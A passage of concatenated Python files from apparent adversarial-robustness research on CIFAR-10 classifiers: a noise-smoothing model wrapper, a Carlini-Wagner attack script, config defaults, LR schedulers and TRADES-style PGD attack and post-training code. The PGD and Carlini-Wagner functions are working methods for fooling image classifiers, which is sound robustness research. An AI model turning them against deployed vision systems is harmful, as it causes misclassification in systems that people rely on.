output_c_list = []
for i in range(self.sample_size):
gaussian_noise = torch.normal(self.mean * input_dummy, self.std * input_dummy).cuda()
# gaussian_noise = input_dummy.cuda()
# linear_noise = torch.randn_like(x).cuda() * 0.1 + 0.9
# gaussian_noise = gaussian_noise * grad_data
gaussian_noise = gaussian_noise * self.get_focus_filter(x.shape)
# if self.adv_filter is not None:
# gaussian_noise = gaussian_noise * self.adv_filter
save_image_stack(torch.mean(torch.abs(gaussian_noise), dim=1, keepdim=True), "gaussian_noise_{}".format(i))
gaussian_input = x + gaussian_noise
# gaussian_input = x * (1 + gaussian_noise)
# gaussian_input = x * gaussian_noise
save_image_stack(gaussian_input, "gaussian_input_{}".format(i), normalized=True)
# gaussian_input = x * linear_noise
gaussian_output = self.base_model(gaussian_input)
# min max norm to 0 ~ 1
gaussian_output -= gaussian_output.min(1, keepdim=True).values
gaussian_output /= gaussian_output.max(1, keepdim=True).values
output_list.append(gaussian_output)
output_c_list.append(int(torch.max(gaussian_output, dim=1).indices))
print(output_c_list)
return torch.mean(torch.stack(output_list), dim=0)
def get_focus_filter(self, shape):
max_distance = 16
# shape: Batch x Channel x H x W
focus_filter = torch.ones(shape)
h_center = torch.randint(0, shape[2], (1, ))
w_center = torch.randint(0, shape[3], (1, ))
# print(shape, h_center, w_center)
for b in range(focus_filter.shape[0]):
for c in range(focus_filter.shape[1]):
for h in range(focus_filter.shape[2]):
for w in range(focus_filter.shape[3]):
distance_to_center = torch.sqrt(torch.square(h - h_center) + torch.square(w - w_center))
focus_filter[b][c][h][w] = 1 - min(1, distance_to_center / max_distance)
save_image_stack(focus_filter, "focus_filter")
return focus_filter.cuda()
def set_adv_filter(self, adv_filter):
self.adv_filter = adv_filter
```
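`SmoothModel` wraps an existing classifier and averages its predictions over noisy, spatially masked copies of the input. A minimal usage sketch; the base network, input shape and batch are placeholders, and a CUDA device plus the repo's `utils.debug_tools` module are assumed, since `forward` moves its noise to the GPU and dumps debug images:
```python
import torch
import torchvision

# any CIFAR-sized 10-class classifier can serve as the base model; resnet18 is only an example
base = torchvision.models.resnet18(num_classes=10).cuda().eval()
smooth = SmoothModel(base, mean=0, std=0.5, sample_size=20).cuda()

images = torch.rand(1, 3, 32, 32).cuda()   # a single image with values in [0, 1]
with torch.no_grad():
    scores = smooth(images)                # averaged, min-max normalised scores over the samples
print(scores.shape)                        # torch.Size([1, 10])
```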
#### File: JokerYan/pytorch_image_classification/ensemble_attack.py
```python
import os
import argparse
import pathlib
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.transforms as torch_transforms
import tqdm
from fvcore.common.checkpoint import Checkpointer
from custom_models.ensemble_model import EnsembleModel
from pytorch_image_classification import (
apply_data_parallel_wrapper,
create_dataloader,
create_loss,
create_model,
get_default_config,
update_config,
)
from pytorch_image_classification.transforms import _get_dataset_stats
from pytorch_image_classification.utils import (
AverageMeter,
create_logger,
get_rank,
)
from utils.debug_tools import clear_debug_image, save_image_stack
# attack parameters temporarily attached here
c = 1
lr = 0.01
momentum = 0.9
steps = 200
batch_size = 1
def load_config(options=None):
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, nargs="+", required=True)
parser.add_argument('--output_dir', type=str, nargs="+", required=True)
parser.add_argument('--checkpoint', type=str, nargs="+", required=True) # relative path from output_dir
parser.add_argument('options', default=None, nargs=argparse.REMAINDER)
args = parser.parse_args()
config = get_default_config()
# the length of these lists are the number of models
assert len(args.config) == len(args.output_dir) == len(args.checkpoint)
config_list = [config.clone() for _ in args.output_dir]
for i, config in enumerate(config_list):
config.merge_from_file(args.config[i])
config.merge_from_list(["test.output_dir", args.output_dir[i]])
config.merge_from_list(["test.checkpoint", os.path.join(args.output_dir[i], args.checkpoint[i])])
config.merge_from_list(args.options)
if options:
config.merge_from_list(options)
update_config(config)
config.freeze()
return config_list
def cal_accuracy(output, target):
with torch.no_grad():
if torch.argmax(output) == torch.argmax(target):
return 1
return 0
class CWInfAttack(nn.Module):
'''
c: coefficient of f value to be added to distance.
    The higher c is, the higher the attack success rate and the larger the resulting distortion
    (see Fig. 2 of the Carlini-Wagner paper).
'''
def __init__(self, model, config, c, lr, momentum, steps, device='cuda'):
super(CWInfAttack, self).__init__()
self.model = model
self.config = config
self.mean, self.std = _get_dataset_stats(config)
self.c = c
self.lr = lr
self.steps = steps
self.device = device
self.momentum = momentum
self.Normalize = torch_transforms.Normalize(
self.mean, self.std
)
self.counter = 0
def denormalize(self, images, is_tensor=True):
if is_tensor:
images = images.clone().detach().cpu().numpy()
# image = np.squeeze(images)
std = np.expand_dims(self.std, [0, 2, 3])
mean = np.expand_dims(self.mean, [0, 2, 3])
images = np.multiply(images, std)
mean = np.multiply(np.ones_like(images), mean)
images = images + mean
# images = np.expand_dims(image, 0)
if is_tensor:
images = torch.Tensor(images).to(self.device)
return images
def forward(self, images, labels):
# must be single image
assert images.shape[0] == 1
images = images.clone().detach().to(self.device)
labels = labels.clone().detach().to(self.device)
# image passed in are normalized, thus not in range [0,1]
images = self.denormalize(images)
w = self.get_init_w(images).detach()
w.requires_grad = True
images.requires_grad = False
tau = 1
best_adv_images = images.clone().detach()
best_acc = 0
best_delta = 1
# optimizer = torch.optim.SGD([w], lr=self.lr, momentum=self.momentum)
optimizer = torch.optim.Adam([w], lr=self.lr)
# random target
# labels is of shape [1], only a number from 0 to 9
target_c = torch.remainder(torch.randint(0, 9, labels.shape).to(self.device) + labels, 10)
target = torch.zeros(1, self.config.dataset.n_classes + 1).to(self.device) # the extra logit for is_fake
# target = torch.zeros(1, self.config.dataset.n_classes).to(self.device) # the extra logit for is_fake
target[:, target_c] = 1
finish_step = self.steps
for step in range(self.steps):
adv_images = self.w_to_adv_images(w)
output = self.model(self.Normalize(adv_images))
# print("is_fake", output[0][-1])
# print("target output", output[0][target_c])
f_value = self.c * self.get_f_value(output, target)
delta = self.w_to_delta(w, images)
distance = self.inf_distance(delta, tau)
loss = f_value + distance
# update tau
if torch.max(delta) < tau:
tau = 0.9 * tau
# compute gradient and do update step
optimizer.zero_grad()
loss.sum().backward()
optimizer.step()
# print out results
acc = cal_accuracy(output, target)
avg_delta = torch.mean(delta)
# print('Acc: {}\tDelta: {}'.format(acc, avg_delta))
if acc > best_acc:
best_adv_images = adv_images
best_acc = acc
best_delta = avg_delta
if acc == best_acc and avg_delta < best_delta:
best_adv_images = adv_images
best_acc = acc
best_delta = avg_delta
if acc == 1:
finish_step = step
break
print('Batch finished: Acc: {}\tDelta: {}\tStep: {}'.format(best_acc, best_delta, finish_step))
print('>>>>>')
# pickle.dump(best_adv_images, open('adv_images_batch.pkl', 'wb'))
if self.counter == 0:
clear_debug_image()
if self.counter < 10 and best_acc == 1:
self.counter += 1
save_image_stack(images, 'original input {} {}'.format(self.counter, best_delta))
save_image_stack(best_adv_images, 'adversarial input {} {}'.format(self.counter, best_delta))
# delta_image = torch.abs(best_adv_images - images)
# print(torch.max(delta_image))
# adjusted_delta = delta_image / torch.max(delta_image)
# save_image_stack(adjusted_delta, 'adjusted delta')
return best_adv_images, best_acc, best_delta
@staticmethod
def get_f_value(outputs, target):
src_p = torch.max(outputs * (1 - target))
target_p = torch.max(outputs * target)
f6 = torch.relu(src_p - target_p)
return f6
@staticmethod
def inf_distance(delta, tau):
dist_vec = torch.relu(delta - tau)
return torch.sum(dist_vec)
@staticmethod
def w_to_adv_images(w):
return 1/2 * (torch.tanh(w) + 1)
@staticmethod
def w_to_delta(w, x):
return torch.abs(CWInfAttack.w_to_adv_images(w) - x)
@staticmethod
def get_init_w(x):
return torch.atanh(2 * x - 1)
def ensemble_attack(config, model, test_loader, loss_func, logger):
device = torch.device(config.device)
model.eval()
attack_model = CWInfAttack(model, config, c, lr, momentum, steps).cuda()
accuracy_meter = AverageMeter()
delta_meter = AverageMeter()
adv_image_list = []
for i, (data, targets) in enumerate(test_loader):
if i == 100:
break
data = data.to(device)
targets = targets.to(device)
adv_images, acc, delta = attack_model(data, targets)
accuracy_meter.update(acc, 1)
delta_meter.update(delta, 1)
adv_image_list.append(adv_images)
logger.info(f'Accuracy {accuracy_meter.avg:.4f} Delta {delta_meter.avg:.4f}')
return adv_image_list, accuracy_meter.avg, delta_meter.avg
def main():
config_list = load_config(["test.batch_size", 1])
model_list = []
for config in config_list:
if config.test.output_dir is None:
output_dir = pathlib.Path(config.test.checkpoint).parent
else:
output_dir = pathlib.Path(config.test.output_dir)
output_dir.mkdir(exist_ok=True, parents=True)
model = create_model(config)
# model = apply_data_parallel_wrapper(config, model)
checkpointer = Checkpointer(model,
save_dir=output_dir)
checkpointer.load(config.test.checkpoint)
model_list.append(model)
logger = create_logger(name=__name__, distributed_rank=get_rank())
test_loader = create_dataloader(config_list[0], is_train=False)
_, test_loss = create_loss(config_list[0])
ensemble_model = EnsembleModel(model_list)
ensemble_attack(config_list[0], ensemble_model, test_loader, test_loss, logger)
if __name__ == '__main__':
main()
```
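`CWInfAttack` optimises in tanh space: `get_init_w` maps pixel values in (0, 1) to an unconstrained variable `w`, and `w_to_adv_images` maps back, which keeps the adversarial image inside the valid pixel range. A quick numerical check that the two mappings are inverses; the sample values are arbitrary:
```python
import torch

x = torch.tensor([0.1, 0.5, 0.9])
w = torch.atanh(2 * x - 1)           # get_init_w
x_back = 0.5 * (torch.tanh(w) + 1)   # w_to_adv_images
print(torch.allclose(x, x_back))     # True
```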
#### File: pytorch_image_classification/config/defaults.py
```python
from .config_node import ConfigNode
config = ConfigNode()
config.device = 'cuda'
# cuDNN
config.cudnn = ConfigNode()
config.cudnn.benchmark = True
config.cudnn.deterministic = False
config.dataset = ConfigNode()
config.dataset.name = 'CIFAR10'
config.dataset.dataset_dir = ''
config.dataset.image_size = 32
config.dataset.n_channels = 3
config.dataset.n_classes = 10
config.dataset.normalize = True
config.model = ConfigNode()
# options: 'cifar', 'imagenet'
# Use 'cifar' for small input images
config.model.type = 'cifar'
config.model.name = 'resnet_preact'
config.model.init_mode = 'kaiming_fan_out'
config.model.vgg = ConfigNode()
config.model.vgg.n_channels = [64, 128, 256, 512, 512]
config.model.vgg.n_layers = [2, 2, 3, 3, 3]
config.model.vgg.use_bn = True
config.model.resnet = ConfigNode()
config.model.resnet.depth = 110 # for cifar type model
config.model.resnet.n_blocks = [2, 2, 2, 2] # for imagenet type model
config.model.resnet.block_type = 'basic'
config.model.resnet.initial_channels = 16
config.model.resnet_preact = ConfigNode()
config.model.resnet_preact.depth = 110 # for cifar type model
config.model.resnet_preact.n_blocks = [2, 2, 2, 2] # for imagenet type model
config.model.resnet_preact.block_type = 'basic'
config.model.resnet_preact.initial_channels = 16
config.model.resnet_preact.remove_first_relu = False
config.model.resnet_preact.add_last_bn = False
config.model.resnet_preact.preact_stage = [True, True, True]
config.model.wrn = ConfigNode()
config.model.wrn.depth = 28 # for cifar type model
config.model.wrn.initial_channels = 16
config.model.wrn.widening_factor = 10
config.model.wrn.drop_rate = 0.0
config.model.densenet = ConfigNode()
config.model.densenet.depth = 100 # for cifar type model
config.model.densenet.n_blocks = [6, 12, 24, 16] # for imagenet type model
config.model.densenet.block_type = 'bottleneck'
config.model.densenet.growth_rate = 12
config.model.densenet.drop_rate = 0.0
config.model.densenet.compression_rate = 0.5
config.model.pyramidnet = ConfigNode()
config.model.pyramidnet.depth = 272 # for cifar type model
config.model.pyramidnet.n_blocks = [3, 24, 36, 3] # for imagenet type model
config.model.pyramidnet.initial_channels = 16
config.model.pyramidnet.block_type = 'bottleneck'
config.model.pyramidnet.alpha = 200
config.model.resnext = ConfigNode()
config.model.resnext.depth = 29 # for cifar type model
config.model.resnext.n_blocks = [3, 4, 6, 3] # for imagenet type model
config.model.resnext.initial_channels = 64
config.model.resnext.cardinality = 8
config.model.resnext.base_channels = 4
config.model.shake_shake = ConfigNode()
config.model.shake_shake.depth = 26 # for cifar type model
config.model.shake_shake.initial_channels = 96
config.model.shake_shake.shake_forward = True
config.model.shake_shake.shake_backward = True
config.model.shake_shake.shake_image = True
config.model.se_resnet_preact = ConfigNode()
config.model.se_resnet_preact.depth = 110 # for cifar type model
config.model.se_resnet_preact.initial_channels = 16
config.model.se_resnet_preact.se_reduction = 16
config.model.se_resnet_preact.block_type = 'basic'
config.model.se_resnet_preact.initial_channels = 16
config.model.se_resnet_preact.remove_first_relu = False
config.model.se_resnet_preact.add_last_bn = False
config.model.se_resnet_preact.preact_stage = [True, True, True]
config.train = ConfigNode()
config.train.checkpoint = ''
config.train.resume = False
config.train.use_apex = True
# optimization level for NVIDIA apex
# O0 = fp32
# O1 = mixed precision
# O2 = almost fp16
# O3 = fp16
config.train.precision = 'O0'
config.train.batch_size = 128
config.train.subdivision = 1
# optimizer (options: sgd, adam, lars, adabound, adaboundw)
config.train.optimizer = 'sgd'
config.train.base_lr = 0.1
config.train.momentum = 0.9
config.train.nesterov = True
config.train.weight_decay = 1e-4
config.train.no_weight_decay_on_bn = False
config.train.gradient_clip = 0.0
config.train.start_epoch = 0
config.train.seed = 0
config.train.val_first = True
config.train.val_period = 1
config.train.val_ratio = 0.0
config.train.use_test_as_val = True
config.train.output_dir = 'experiments/exp00'
config.train.log_period = 100
config.train.checkpoint_period = 10
config.train.use_tensorboard = True
config.tensorboard = ConfigNode()
config.tensorboard.train_images = False
config.tensorboard.val_images = False
config.tensorboard.model_params = False
# optimizer
config.optim = ConfigNode()
# Adam
config.optim.adam = ConfigNode()
config.optim.adam.betas = (0.9, 0.999)
# LARS
config.optim.lars = ConfigNode()
config.optim.lars.eps = 1e-9
config.optim.lars.threshold = 1e-2
# AdaBound
config.optim.adabound = ConfigNode()
config.optim.adabound.betas = (0.9, 0.999)
config.optim.adabound.final_lr = 0.1
config.optim.adabound.gamma = 1e-3
# scheduler
config.scheduler = ConfigNode()
config.scheduler.epochs = 160
# warm up (options: none, linear, exponential)
config.scheduler.warmup = ConfigNode()
config.scheduler.warmup.type = 'none'
config.scheduler.warmup.epochs = 0
config.scheduler.warmup.start_factor = 1e-3
config.scheduler.warmup.exponent = 4
# main scheduler (options: constant, linear, multistep, cosine, sgdr)
config.scheduler.type = 'multistep'
config.scheduler.milestones = [80, 120]
config.scheduler.lr_decay = 0.1
config.scheduler.lr_min_factor = 0.001
config.scheduler.T0 = 10
config.scheduler.T_mul = 1.
# train data loader
config.train.dataloader = ConfigNode()
config.train.dataloader.num_workers = 2
config.train.dataloader.drop_last = True
config.train.dataloader.pin_memory = False
config.train.dataloader.non_blocking = False
# validation data loader
config.validation = ConfigNode()
config.validation.batch_size = 256
config.validation.dataloader = ConfigNode()
config.validation.dataloader.num_workers = 2
config.validation.dataloader.drop_last = False
config.validation.dataloader.pin_memory = False
config.validation.dataloader.non_blocking = False
# distributed
config.train.distributed = False
config.train.dist = ConfigNode()
config.train.dist.backend = 'nccl'
config.train.dist.init_method = 'env://'
config.train.dist.world_size = -1
config.train.dist.node_rank = -1
config.train.dist.local_rank = 0
config.train.dist.use_sync_bn = False
config.augmentation = ConfigNode()
config.augmentation.use_random_crop = True
config.augmentation.use_random_horizontal_flip = True
config.augmentation.use_cutout = False
config.augmentation.use_random_erasing = False
config.augmentation.use_dual_cutout = False
config.augmentation.use_mixup = False
config.augmentation.use_ricap = False
config.augmentation.use_cutmix = False
config.augmentation.use_label_smoothing = False
config.augmentation.random_crop = ConfigNode()
config.augmentation.random_crop.padding = 4
config.augmentation.random_crop.fill = 0
config.augmentation.random_crop.padding_mode = 'constant'
config.augmentation.random_horizontal_flip = ConfigNode()
config.augmentation.random_horizontal_flip.prob = 0.5
config.augmentation.cutout = ConfigNode()
config.augmentation.cutout.prob = 1.0
config.augmentation.cutout.mask_size = 16
config.augmentation.cutout.cut_inside = False
config.augmentation.cutout.mask_color = 0
config.augmentation.cutout.dual_cutout_alpha = 0.1
config.augmentation.random_erasing = ConfigNode()
config.augmentation.random_erasing.prob = 0.5
config.augmentation.random_erasing.area_ratio_range = [0.02, 0.4]
config.augmentation.random_erasing.min_aspect_ratio = 0.3
config.augmentation.random_erasing.max_attempt = 20
config.augmentation.mixup = ConfigNode()
config.augmentation.mixup.alpha = 1.0
config.augmentation.ricap = ConfigNode()
config.augmentation.ricap.beta = 0.3
config.augmentation.cutmix = ConfigNode()
config.augmentation.cutmix.alpha = 1.0
config.augmentation.label_smoothing = ConfigNode()
config.augmentation.label_smoothing.epsilon = 0.1
config.tta = ConfigNode()
config.tta.use_resize = False
config.tta.use_center_crop = False
config.tta.resize = 256
# test config
config.test = ConfigNode()
config.test.checkpoint = ''
config.test.output_dir = ''
config.test.batch_size = 256
# test data loader
config.test.dataloader = ConfigNode()
config.test.dataloader.num_workers = 2
config.test.dataloader.pin_memory = False
# custom part
config.custom_model = ConfigNode()
config.custom_model.name = ''
def get_default_config():
return config.clone()
```
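These defaults are consumed through `get_default_config()` and then overridden with yacs-style merge calls, exactly as the attack script above does. A minimal sketch; the override values are arbitrary:
```python
from pytorch_image_classification import get_default_config

config = get_default_config()
config.merge_from_list(['train.batch_size', 64, 'model.name', 'resnet_preact'])
config.freeze()
print(config.train.batch_size, config.model.name)   # 64 resnet_preact
```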
#### File: pytorch_image_classification/scheduler/components.py
```python
import numpy as np
class ConstantScheduler:
def __init__(self, steps, lr):
self.steps = steps
self.lr = lr
def __call__(self, step):
return self.lr
class CosineScheduler:
def __init__(self, steps, base_lr, lr_min_factor=1e-3):
self.steps = steps
self.base_lr = base_lr
self.lr_min_factor = lr_min_factor
def __call__(self, step):
return self.base_lr * (self.lr_min_factor +
(1 - self.lr_min_factor) * 0.5 *
(1 + np.cos(step / self.steps * np.pi)))
class ExponentialScheduler:
def __init__(self, steps, base_lr, exponent, lr_start_factor=1e-3):
self.steps = steps
self.base_lr = base_lr
self.exponent = exponent
self.lr_start_factor = lr_start_factor
def __call__(self, step):
return self.base_lr * (self.lr_start_factor +
(1 - self.lr_start_factor) *
(step / self.steps)**self.exponent)
class LinearScheduler:
def __init__(self, steps, lr_start, lr_end):
self.steps = steps
self.lr_start = lr_start
self.lr_end = lr_end
def __call__(self, step):
return self.lr_start + (self.lr_end -
self.lr_start) * step / self.steps
``` |
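Each scheduler component is a callable mapping a step index to a learning rate. A quick look at the cosine schedule's endpoints, using the class defined above; the numbers are chosen for illustration:
```python
sched = CosineScheduler(steps=100, base_lr=0.1, lr_min_factor=1e-3)
print(sched(0))     # 0.1: cos(0) = 1, so the full base learning rate
print(sched(100))   # 1e-4: cos(pi) = -1, so base_lr * lr_min_factor
```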
{
"source": "JokerYan/TRADES",
"score": 2
} |
#### File: JokerYan/TRADES/post_utils.py
```python
import copy
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import Subset
from torchvision import datasets, transforms
import apex.amp as amp
import numpy as np
from trades import trades_loss
cifar10_mean = (0.0, 0.0, 0.0)
cifar10_std = (1.0, 1.0, 1.0)
mu = torch.tensor(cifar10_mean).view(3,1,1).cuda()
std = torch.tensor(cifar10_std).view(3,1,1).cuda()
upper_limit = ((1 - mu)/ std)
lower_limit = ((0 - mu)/ std)
def cal_accuracy(outputs, labels):
_, predictions = torch.max(outputs, 1)
# collect the correct predictions for each class
correct = 0
total = 0
for label, prediction in zip(labels, predictions):
if label == prediction:
correct += 1
total += 1
return correct / total
def merge_images(train_images, val_images, ratio, device):
batch_size = len(train_images)
repeated_val_images = val_images.repeat(batch_size, 1, 1, 1)
merged_images = ratio * train_images.to(device) + (1 - ratio) * repeated_val_images.to(device)
# image[0][channel] = 0.5 * image[0][channel].to(device) + 0.5 * val_images[0][channel].to(device)
return merged_images
def clamp(X, lower_limit, upper_limit):
return torch.max(torch.min(X, upper_limit), lower_limit)
def get_train_loaders_by_class(dir_, batch_size):
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(cifar10_mean, cifar10_std),
])
train_dataset = datasets.CIFAR10(
dir_, train=True, transform=train_transform, download=True)
indices_list = [[] for _ in range(10)]
for i in range(len(train_dataset)):
label = int(train_dataset[i][1])
indices_list[label].append(i)
dataset_list = [Subset(train_dataset, indices) for indices in indices_list]
train_loader_list = [
torch.utils.data.DataLoader(
dataset=dataset,
batch_size=batch_size,
shuffle=True,
pin_memory=True,
num_workers=0,
) for dataset in dataset_list
]
return train_loader_list
def attack_pgd(model, X, y, epsilon, alpha, attack_iters, restarts, opt=None, random_start=True):
max_loss = torch.zeros(y.shape[0]).cuda()
max_delta = torch.zeros_like(X).cuda()
epsilon = torch.ones([3, 1, 1]).cuda() * epsilon
for zz in range(restarts):
delta = torch.zeros_like(X).cuda()
if random_start:
for i in range(len(epsilon)):
delta[:, i, :, :].uniform_(-epsilon[i][0][0].item(), epsilon[i][0][0].item())
delta.data = clamp(delta, lower_limit - X, upper_limit - X)
delta.requires_grad = True
for _ in range(attack_iters):
output = model(X + delta)
index = torch.where(output.max(1)[1] == y)
if len(index[0]) == 0:
break
loss = F.cross_entropy(output, y)
if opt is not None:
with amp.scale_loss(loss, opt) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
grad = delta.grad.detach()
d = delta[index[0], :, :, :]
g = grad[index[0], :, :, :]
d = clamp(d + alpha * torch.sign(g), -epsilon, epsilon)
d = clamp(d, lower_limit - X[index[0], :, :, :], upper_limit - X[index[0], :, :, :])
delta.data[index[0], :, :, :] = d
delta.grad.zero_()
all_loss = F.cross_entropy(model(X+delta), y, reduction='none').detach()
max_delta[all_loss >= max_loss] = delta.detach()[all_loss >= max_loss]
max_loss = torch.max(max_loss, all_loss)
return max_delta
def attack_pgd_targeted(model, X, y, target, epsilon, alpha, attack_iters, restarts, opt=None, random_start=True):
max_loss = torch.zeros(y.shape[0]).cuda()
max_delta = torch.zeros_like(X).cuda()
epsilon = torch.ones([3, 1, 1]).cuda() * epsilon
for zz in range(restarts):
delta = torch.zeros_like(X).cuda()
if random_start:
for i in range(len(epsilon)):
delta[:, i, :, :].uniform_(-epsilon[i][0][0].item(), epsilon[i][0][0].item())
delta.data = clamp(delta, lower_limit - X, upper_limit - X)
delta.requires_grad = True
for _ in range(attack_iters):
output = model(X + delta)
index = torch.where(output.max(1)[1] != target)
if len(index[0]) == 0:
break
loss = F.cross_entropy(output, target)
if opt is not None:
with amp.scale_loss(loss, opt) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
grad = delta.grad.detach()
d = delta[index[0], :, :, :]
g = -1 * grad[index[0], :, :, :]
d = clamp(d + alpha * torch.sign(g), -epsilon, epsilon)
d = clamp(d, lower_limit - X[index[0], :, :, :], upper_limit - X[index[0], :, :, :])
delta.data[index[0], :, :, :] = d
delta.grad.zero_()
all_loss = F.cross_entropy(model(X+delta), target, reduction='none').detach()
max_delta[all_loss >= max_loss] = delta.detach()[all_loss >= max_loss]
max_loss = torch.max(max_loss, all_loss)
return max_delta
def attack_pgd_trades(model, data, label, epsilon, alpha, step_count, random_start, device):
X, y = Variable(data, requires_grad=True), Variable(label)
X_pgd = Variable(X.data, requires_grad=True)
if random_start:
random_noise = torch.FloatTensor(*X_pgd.shape).uniform_(-epsilon, epsilon).to(device)
X_pgd = Variable(X_pgd.data + random_noise, requires_grad=True)
for _ in range(step_count):
opt = torch.optim.SGD([X_pgd], lr=1e-3)
opt.zero_grad()
with torch.enable_grad():
loss = nn.CrossEntropyLoss()(model(X_pgd), y)
loss.backward()
eta = alpha * X_pgd.grad.data.sign()
X_pgd = Variable(X_pgd.data + eta, requires_grad=True)
eta = torch.clamp(X_pgd.data - X.data, -epsilon, epsilon)
X_pgd = Variable(X.data + eta, requires_grad=True)
X_pgd = Variable(torch.clamp(X_pgd, 0, 1.0), requires_grad=True)
return X_pgd
def attack_pgd_trades_targeted(model, data, target, epsilon, alpha, step_count, random_start, device):
X, y = Variable(data, requires_grad=True), Variable(target)
X_pgd = Variable(X.data, requires_grad=True)
if random_start:
random_noise = torch.FloatTensor(*X_pgd.shape).uniform_(-epsilon, epsilon).to(device)
X_pgd = Variable(X_pgd.data + random_noise, requires_grad=True)
for _ in range(step_count):
opt = torch.optim.SGD([X_pgd], lr=1e-3)
opt.zero_grad()
with torch.enable_grad():
loss = nn.CrossEntropyLoss()(model(X_pgd), y)
loss.backward()
eta = -1 * alpha * X_pgd.grad.data.sign()
X_pgd = Variable(X_pgd.data + eta, requires_grad=True)
eta = torch.clamp(X_pgd.data - X.data, -epsilon, epsilon)
X_pgd = Variable(X.data + eta, requires_grad=True)
X_pgd = Variable(torch.clamp(X_pgd, 0, 1.0), requires_grad=True)
return X_pgd
def post_train(model, images, train_loader, train_loaders_by_class, args):
alpha = (10 / 255)
epsilon = (8 / 255)
loss_func = nn.CrossEntropyLoss()
device = torch.device('cuda')
model = copy.deepcopy(model)
# model.train()
fix_model = copy.deepcopy(model)
# attack_model = torchattacks.PGD(model, eps=(8/255)/std, alpha=(2/255)/std, steps=20)
optimizer = torch.optim.SGD(lr=args.pt_lr,
params=model.parameters(),
momentum=0.9,
nesterov=True)
kl_loss = nn.KLDivLoss(reduction='batchmean')
# target_bce_loss_func = TargetBCELoss()
# target_bl_loss_func = TargetBLLoss()
images = images.detach()
with torch.enable_grad():
# find neighbour
original_output = fix_model(images)
original_class = torch.argmax(original_output).reshape(1)
# neighbour_images = attack_model(images, original_class)
# neighbour_delta = attack_pgd(model, images, original_class, epsilon, alpha,
# attack_iters=20, restarts=1, random_start=args.rs_neigh)
# neighbour_images = neighbour_delta + images
min_target_loss = float('inf')
max_target_loss = float('-inf')
neighbour_delta = None
for target_idx in range(10):
if target_idx == original_class:
continue
target = torch.ones_like(original_class) * target_idx
# neighbour_delta_targeted = attack_pgd_targeted(model, images, original_class, target, epsilon, alpha,
# attack_iters=20, restarts=1, random_start=args.rs_neigh).detach()
neighbour_images_targeted = attack_pgd_trades(fix_model, images, original_class, epsilon, alpha, 20, args.rs_neigh, device)
neighbour_delta_targeted = neighbour_images_targeted - images
target_output = fix_model(images + neighbour_delta_targeted)
target_loss = loss_func(target_output, target)
if target_loss < min_target_loss:
min_target_loss = target_loss
neighbour_delta = neighbour_delta_targeted
# target_loss = loss_func(target_output, original_class)
# if target_loss > max_target_loss:
# max_target_loss = max_target_loss
# neighbour_delta = neighbour_delta_targeted
# print(int(target), float(target_loss))
neighbour_images = images + neighbour_delta
# neighbour_images = attack_pgd_trades(fix_model, images, original_class, epsilon, alpha, 20, args.rs_neigh, device)
# neighbour_delta = (neighbour_images - images).detach()
neighbour_output = fix_model(neighbour_images)
neighbour_class = torch.argmax(neighbour_output).reshape(1)
if original_class == neighbour_class:
print('original class == neighbour class')
if args.pt_data == 'ori_neigh':
return model, original_class, neighbour_class, None, None
loss_list = []
acc_list = []
for i in range(args.pt_iter):
# # randomize neighbour
# if args.pt_data == 'ori_rand':
# neighbour_class = (original_class + random.randint(1, 9)) % 10
# elif args.pt_data == 'rand':
# original_class = (original_class + random.randint(0, 9)) % 10
# neighbour_class = (original_class + random.randint(0, 9)) % 10
# else:
# raise NotImplementedError
original_data, original_label = next(iter(train_loaders_by_class[original_class]))
neighbour_data, neighbour_label = next(iter(train_loaders_by_class[neighbour_class]))
# train_data, train_label = next(iter(train_loader))
# data = train_data.to(device)
# label = train_label.to(device)
if args.pt_data == 'ori_neigh_train':
raise NotImplementedError
# data = torch.vstack([original_data, neighbour_data, train_data]).to(device)
# label = torch.hstack([original_label, neighbour_label, train_label]).to(device)
else:
data = torch.vstack([original_data, neighbour_data]).to(device)
label = torch.hstack([original_label, neighbour_label]).to(device)
if args.mixup:
data = merge_images(data, images, 0.7, device)
# target = torch.hstack([neighbour_label, original_label]).to(device)
# # generate pgd adv examples
# X, y = Variable(data, requires_grad=True), Variable(label)
# X_pgd = Variable(X.data, requires_grad=True)
# random_noise = torch.FloatTensor(*X_pgd.shape).uniform_(-epsilon, epsilon).to(device)
# X_pgd = Variable(X_pgd.data + random_noise, requires_grad=True)
# for _ in range(20):
# opt = torch.optim.SGD([X_pgd], lr=1e-3)
# opt.zero_grad()
#
# with torch.enable_grad():
# loss = nn.CrossEntropyLoss()(fix_model(X_pgd), y)
# loss.backward()
# eta = 0.003 * X_pgd.grad.data.sign()
# X_pgd = Variable(X_pgd.data + eta, requires_grad=True)
# eta = torch.clamp(X_pgd.data - X.data, -epsilon, epsilon)
# X_pgd = Variable(X.data + eta, requires_grad=True)
# X_pgd = Variable(torch.clamp(X_pgd, 0, 1.0), requires_grad=True)
# adv_input = X_pgd
# generate fgsm adv examples
delta = (torch.rand_like(data) * 2 - 1) * epsilon # uniform rand from [-eps, eps]
noise_input = data + delta
noise_input.requires_grad = True
noise_output = model(noise_input)
loss = loss_func(noise_output, label) # loss to be maximized
# loss = target_bce_loss_func(noise_output, label, original_class, neighbour_class) # bce loss to be maximized
input_grad = torch.autograd.grad(loss, noise_input)[0]
delta = delta + alpha * torch.sign(input_grad)
delta.clamp_(-epsilon, epsilon)
adv_input = data + delta
# # directed adv
# adv_input = data + (torch.randint(0, 2, size=()) - 0.5).to(device) * 2 * neighbour_delta
# adv_input = data + -1 * torch.rand_like(data).to(device) * neighbour_delta
# adv_input = data + -1 * neighbour_delta
# directed_delta = torch.vstack([torch.ones_like(original_data).to(device) * neighbour_delta,
# torch.ones_like(neighbour_data).to(device) * -1 * neighbour_delta])
# adv_input = data + directed_delta
# generate pgd adv example
# attack_model.set_mode_targeted_by_function(lambda im, la: target)
# adv_input = attack_model(data, label)
normal_output = model(data.detach())
if args.pt_method == 'adv':
adv_output = model(adv_input.detach())
elif args.pt_method == 'normal':
adv_output = model(data.detach()) # non adv training
else:
raise NotImplementedError
# _, adv_output_class = torch.max(adv_output, 1)
# original_class_expanded = torch.ones_like(adv_output_class) * int(original_class)
# neighbour_class_expanded = torch.ones_like(adv_output_class) * int(neighbour_class)
